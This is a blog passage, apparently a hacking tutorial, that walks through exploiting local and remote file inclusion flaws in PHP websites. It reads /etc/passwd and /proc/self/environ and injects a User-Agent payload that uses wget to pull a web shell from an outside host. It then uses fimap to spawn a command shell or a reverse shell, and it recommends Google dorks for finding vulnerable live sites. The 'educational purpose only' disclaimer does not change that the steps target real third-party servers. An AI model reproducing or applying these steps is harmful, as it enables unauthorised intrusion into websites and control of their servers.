<h1>
<span style="font-size: 11pt;"><span class="Apple-style-span" style="font-family: Arial, sans-serif;"><br /></span>
<span class="Apple-style-span" style="font-family: Arial, sans-serif; font-weight: normal;"> we succesfully included the etc/passwd file.</span><span class="Apple-style-span" style="font-family: Arial, sans-serif;"><o:p></o:p></span></span></h1>
<h1>
<span style="font-family: Arial, sans-serif; font-size: 11pt;"><span class="Apple-style-span" style="font-weight: normal;">The check for /proc/self/environ (in place of
/etc/passwd) we get message like :</span><o:p></o:p></span></h1>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqShUempyMmVBEovkCakp_g08BVX3OS6gYTB4k4qvA8L6Z3cvsBdCfokfkNfB7pVED06xBeYQTbRknnn6jX5VrcdJIpvgMHYT7Hf4fzeJWtTJAC2WFV9Un_Vj2pIotrMLaNSHMvzSGbi0/s1600/12.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="30" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqShUempyMmVBEovkCakp_g08BVX3OS6gYTB4k4qvA8L6Z3cvsBdCfokfkNfB7pVED06xBeYQTbRknnn6jX5VrcdJIpvgMHYT7Hf4fzeJWtTJAC2WFV9Un_Vj2pIotrMLaNSHMvzSGbi0/s640/12.JPG" width="640" /></a></div>
<h1>
<span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span"><span style="font-family: Arial, sans-serif; font-size: 11pt;">The we need </span><span style="font-family: Arial, sans-serif; font-size: 11pt;">Tamper data </span></span><span style="font-family: Arial, sans-serif; font-size: 11pt;"><span class="Apple-style-span">addon on firefox :</span></span></span></h1>
<h1>
<span style="font-family: Arial, sans-serif; font-size: 11pt;"><span class="Apple-style-span" style="font-weight: normal;">Choose Tamper and in User-Agent filed write
the following code : </span><br />
<br />
</span><span style="font-family: Arial, sans-serif; font-size: 11pt;"><?system('wget
http://site.com/shel.txt -O shel.php');?></span><span style="font-family: Arial, sans-serif; font-size: 11pt;"><br />
<br /><span class="Apple-style-span" style="font-weight: normal;">
Then submit the request.</span><o:p></o:p></span></h1>
<h1>
<span style="font-family: Arial, sans-serif; font-size: 11pt;">(*here shel.txt must contain the shel code
where we are getting from other site using wget command*)<o:p></o:p></span></h1>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif;">Tada !.
shel uploaded. </span></span><span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Wingdings;">J</span></span><span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif;"><o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><u><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">Warning:
</span></u></b></span><span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 12pt; line-height: 115%;">I am not responsible for your actions , please be
careful.this is for educational purpose only.<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 13pt; line-height: 115%;">--------------------------------------------------------------------------------<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><u><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 13pt; line-height: 115%;"><b><br /></b></span></u></span>
<span class="apple-style-span"><u><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 13pt; line-height: 115%;"><b>Automated:<o:p></o:p></b></span></u></span><br />
<span class="apple-style-span"><u><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 13pt; line-height: 115%;"><b><br /></b></span></u></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">now remove the file name in the url and replace
with “ ../ “ (without quotes)<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">if you get error like ::<o:p></o:p></span></span><br />
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: #eeeeee; font-family: 'Trebuchet MS', sans-serif; font-size: 8.5pt; line-height: 115%;">Warning</span></b></span><span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: #eeeeee; font-family: 'Trebuchet MS', sans-serif; font-size: 8.5pt; line-height: 115%;">:
include_once(../) [<a href="http://www.thylacinecycles.com/function.include-once"><span style="color: #ff9900; font-family: Arial, sans-serif;">function.include-once</span></a>]:
failed to open stream: Inappropriate ioctl for device in</span></span><span class="apple-converted-space"><span style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: #eeeeee; font-family: 'Trebuchet MS', sans-serif; font-size: 8.5pt; line-height: 115%;"> </span></span><span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: #eeeeee; font-family: 'Trebuchet MS', sans-serif; font-size: 8.5pt; line-height: 115%;">/home/sitname
/public_html/index.php</span></b></span><span class="apple-converted-space"><span style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: #eeeeee; font-family: 'Trebuchet MS', sans-serif; font-size: 8.5pt; line-height: 115%;"> </span></span><span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: #eeeeee; font-family: 'Trebuchet MS', sans-serif; font-size: 8.5pt; line-height: 115%;">on line</span></span><span class="apple-converted-space"><span style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: #eeeeee; font-family: 'Trebuchet MS', sans-serif; font-size: 8.5pt; line-height: 115%;"> </span></span><span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: #eeeeee; font-family: 'Trebuchet MS', sans-serif; font-size: 8.5pt; line-height: 115%;">10</span></b></span><span style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: #eeeeee; font-family: 'Trebuchet MS', sans-serif; font-size: 8.5pt; line-height: 115%;"><br />
<br />
<span class="apple-style-span"><b>Warning</b>: include_once() [<a href="http://www.thylacinecycles.com/function.include"><span style="color: #ff9900; font-family: Arial, sans-serif;">function.include</span></a>]: Failed
opening '../' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php')
in<b>/home/sitename/public_html/index.php</b></span><span class="apple-converted-space"> </span><span class="apple-style-span">on line</span><span class="apple-converted-space"> </span><span class="apple-style-span"><b>10<o:p></o:p></b></span></span><br />
<span style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: #eeeeee; font-family: 'Trebuchet MS', sans-serif; font-size: 8.5pt; line-height: 115%;"><span class="apple-style-span"><b><br /></b></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">It is vulnerable to LFI<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">Now to
attack :<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">You need a python script called “ fimap “ which
can be downloaded from google<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">U need python installed to execute it.<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">Open cmd prompt goto the folder where fimap.py
script is present and type ::<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;"> “ <b>fimap.py –u www.site.com/file.php?page=file.php</b>
“<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">(<b> -u
:- option for scan if vuln exists or
not)</b><o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;"><b><br /></b></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">It tests for injecting a file where it is
vulnerable : looks like this<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;"><br /></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXMAlVYCZ3OlLH-6fwjX_uVmvUWmcOY3qw34p1EhyphenhyphenUSojC097hMng4Ui5dbdOhD1KFPIcCqM_BUs6Gcfu7w6uZCmeau8WHBkyZtyjZzAtCWL4qCRkwPdVt4n4qxhQwFZGZN6jDRIjSDa0/s1600/1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXMAlVYCZ3OlLH-6fwjX_uVmvUWmcOY3qw34p1EhyphenhyphenUSojC097hMng4Ui5dbdOhD1KFPIcCqM_BUs6Gcfu7w6uZCmeau8WHBkyZtyjZzAtCWL4qCRkwPdVt4n4qxhQwFZGZN6jDRIjSDa0/s640/1.JPG" width="640" /></a></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="Apple-style-span" style="font-family: Arial, sans-serif; font-size: x-small;"><span class="Apple-style-span" style="line-height: 14px;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;"><br /></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">Here from the above pic u can see at the bottom
with : “ [1] /proc/self/environ “<o:p></o:p></span></span></div>
<div class="MsoListParagraph" style="mso-list: l0 level1 lfo1; text-align: justify; text-indent: -.25in;">
<span class="apple-style-span"><span style="color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">0 (0-<span style="font: normal normal normal 7pt/normal 'Times New Roman';"> </span></span></span><span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">Clean/readable ,
1- writable)<o:p></o:p></span></span></div>
<div class="MsoListParagraph" style="mso-list: l0 level1 lfo1; text-align: justify; text-indent: -.25in;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">Now to exploit :: type:<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">“<b> fimap.py
–x www.site.com/file.php?page=file.php “<o:p></o:p></b></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;"><b><br /></b></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;"> (-x : to
exploit ; -u : scan for vuln).<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">Now you will find like this :<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;"><br /></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1l0LNn8Y1N4IYYvIIfu1Y4eyPOjeTE8hFebkE8Cf5gFE15Aljui_TLSEfB8J06kMxKHkL56M1FBwZXfzBB-AfixBLqr3312Nj9hilanq5uej7JVIA7bU9irGTfb7gvZPr8YoO4XZYEFM/s1600/2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="196" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1l0LNn8Y1N4IYYvIIfu1Y4eyPOjeTE8hFebkE8Cf5gFE15Aljui_TLSEfB8J06kMxKHkL56M1FBwZXfzBB-AfixBLqr3312Nj9hilanq5uej7JVIA7bU9irGTfb7gvZPr8YoO4XZYEFM/s640/2.JPG" width="640" /></a></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="Apple-style-span" style="font-family: Arial, sans-serif; font-size: x-small;"><span class="Apple-style-span" style="line-height: 14px;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;"><br /></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">Choose domain , well here u need to choose a
number here my option is “9” ,the thing here is the fimap stores the history of
successful exploiting . so choose number corresponding to the domain which u
have scanned.<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">After that it asks for options again to choose
type vuln script (choose the number ,if there is only one script the type 1).<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">Then again it asks for type of available attacks
: they are:<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">1.spawn fimap shell<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">2.pentest monkey reverse shell<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">Select option 1.<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">It will successfully inject <o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">Tada ! you
get the command prompt of the host.<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">( as for
pentest monkey shell ,you need netcat and an open port to get the connection
back.)<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><u><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">Warning:
</span></u></b></span><span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 12pt; line-height: 115%;">I am not responsible for your actions , please be
careful.this is for educational purpose only.<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 12pt; line-height: 115%;">You hardly
find LFI vuln sites ,you need work ur ass off to get the sites.<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 12pt; line-height: 115%;">--------------------------------------------------------------------------------------------------------<u><o:p></o:p></u></span></b></span></div>
</div>
sudhirhttp://www.blogger.com/profile/07016075449331701681noreply@blogger.com1tag:blogger.com,1999:blog-7651709861170417818.post-13172834225291835192011-10-17T23:02:00.000-07:002011-10-17T23:02:54.568-07:00RFI (Remote File Inclusion)<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">Remote File Inclusion</span></b></span><span class="apple-converted-space"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"> </span></span><span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">(RFI) is a type
of</span></span><span class="apple-converted-space"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"> </span></span><span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">vulnerability</span></span><span class="apple-converted-space"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"> </span></span><span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">some websites.
It allows an attacker to include a remote file, usually through a script on the</span></span><span class="apple-converted-space"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"> </span></span><span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">web server. The vulnerability</span></span><span class="apple-converted-space"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"> </span></span><span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">occurs due to
the use of user-supplied input without proper validation.</span> This can lead
to</span> Code execution on the<span class="apple-converted-space"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"> </span></span><span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">web server.<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify; text-indent: 1.0in;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">The main cause
is due to the use of</span></span><span class="apple-converted-space"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"> </span></span><span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">unvalidated</span></span><span class="apple-converted-space"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"> </span></span><span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">external</span></span><span class="apple-converted-space"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"> </span></span><span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">variables , Most
notable is the</span></span><span class="apple-converted-space"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"> </span></span><span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">include</span></span><span class="apple-converted-space"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"> </span></span><span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">statement.<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">The vuln. Code looks like:<span> </span><o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><span><br /></span></span></span></div>
<div style="background: #F9F9F9; border: dashed #2F6FAB 1.0pt; mso-border-alt: dashed #2F6FAB .75pt; mso-element: para-border-div; padding: 12.0pt 12.0pt 12.0pt 12.0pt;">
<pre style="background: #F9F9F9; border: none; mso-border-alt: dashed #2F6FAB .75pt; mso-padding-alt: 12.0pt 12.0pt 12.0pt 12.0pt; padding: 0in;"><span class="kw2"><b><span style="background: white; color: black;"><?php</span></b></span><span style="background: white; color: black;"><o:p></o:p></span></pre>
<pre style="background: #F9F9F9; border: none; mso-border-alt: dashed #2F6FAB .75pt; mso-padding-alt: 12.0pt 12.0pt 12.0pt 12.0pt; padding: 0in;"><span style="background: white; color: black;"><span> </span></span><span class="kw1"><span style="background: white; color: #b1b100;">include</span></span><span class="br0"><span style="background: white; color: #009900;">(</span></span><span class="re0"><span style="background: white; color: #000088;">$_GET</span></span><span class="br0"><span style="background: white; color: #009900;">[</span></span><span class="sth"><span style="background: white; color: blue;">'page'</span></span><span class="br0"><span style="background: white; color: #009900;">])</span></span><span class="sy0"><span style="background: white; color: #339933;">;</span></span><span style="background: white; color: black;"><o:p></o:p></span></pre>
<pre style="background: #F9F9F9; border: none; mso-border-alt: dashed #2F6FAB .75pt; mso-padding-alt: 12.0pt 12.0pt 12.0pt 12.0pt; padding: 0in;"><span class="kw2"><b><span style="background: white; color: black;">?></span></b></span><span style="background: white; color: black;"><o:p></o:p></span></pre>
<pre style="background: #F9F9F9; border: none; mso-border-alt: dashed #2F6FAB .75pt; mso-padding-alt: 12.0pt 12.0pt 12.0pt 12.0pt; padding: 0in;"><span style="background: white; color: black;"><o:p> </o:p></span></pre>
</div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">To attack you do is search for site:<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">Example using google dork inurl:php?page= or some
kind of the url should be like:<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">www.site.com/somefile.php?page=www.somesite.com<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">well we wont find RFI vuln sites these days you
may find 1 or 2 in a million or maybe not.this is for educational purpose only.but
I will be explaining you with screenshots.<o:p></o:p></span></span></div>
